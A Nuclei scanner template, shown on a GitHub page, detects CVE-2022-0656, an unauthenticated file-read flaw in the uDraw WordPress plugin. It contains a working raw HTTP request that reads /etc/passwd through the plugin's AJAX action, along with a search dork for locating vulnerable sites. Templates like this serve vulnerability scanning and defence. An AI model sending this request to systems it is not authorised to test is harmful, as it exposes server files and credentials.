-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-0656.yaml
44 lines (37 loc) · 1.45 KB
/
CVE-2022-0656.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
id: CVE-2022-0656
info:
name: uDraw <3.3.3 - Local File Inclusion
author: akincibor
severity: high
description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
reference:
- https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
- https://nvd.nist.gov/vuln/detail/CVE-2022-0656
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-0656
cwe-id: CWE-552
metadata:
google-dork: inurl:"/wp-content/plugins/udraw"
verified: "true"
tags: cve,cve2022,wp,wordpress,lfi,udraw,wp-plugin,unauth
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=udraw_convert_url_to_base64&url=/etc/passwd
matchers-condition: and
matchers:
- type: word
words:
- "cm9vd" # root in base64
- "data:image\\/;base64"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22